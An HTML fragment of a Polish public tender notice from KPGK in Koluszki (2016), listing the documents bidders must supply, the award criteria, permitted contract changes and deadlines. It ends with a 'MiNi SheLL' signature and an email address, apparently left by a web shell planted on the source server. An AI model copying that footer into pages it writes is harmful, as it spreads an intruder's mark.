<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz ofertowy, załączniki do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - wydłuzenie okresu gwarancji jakości i rękojmi - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>7.	Zamawiający przewiduje zmianę istotnych postanowień umowy 
w  szczególności  w następujących wypadkach:
1)  Zmiany ceny przy zaistnieniu zmian stawek podatkowych.
2)  Przedłużenie terminu realizacji umowy w przypadku,  gdy przedłużenie  nastąpiło z przyczyn niezależnych od Stron a w szczególności w przypadku:
a)	szczególnie niekorzystnych warunków atmosferycznych, uniemożliwiających prawidłowe wykonywanie przedmiotu zamówienia,
b)	katastrofy budowlanej,
c)	siły wyższej, powodującej klęskę żywiołową, 
  3) Zmniejszenie zakresu realizacji niniejszej umowy z przyczyn niezależnych od stron. Zmiana ta może pociągać za sobą zmniejszenie wynagrodzenia Wykonawcy. 
  4) Zmiana terminu wymaga zgody Zamawiającego i musi być przez Wykonawcę udokumentowana - pismo (wniosek) dotyczące zmiany terminu , Wykonawca zobowiązany jest złożyć w terminie 7 dni przed upływem  terminu zakończenia realizacji umowy.
  5) oraz w innych wypadkach określonych w projekcie umowy.
Zmiana umowy wymaga, pod rygorem nieważności, formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kpgk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> KPGK Sp. z o. o. 
95-040 Koluszki, ul. Mickiewicza 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2016 godzina 12:00, miejsce: KPGK Sp. z o. o. 
95-040 Koluszki, ul. Mickiewicza 4 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com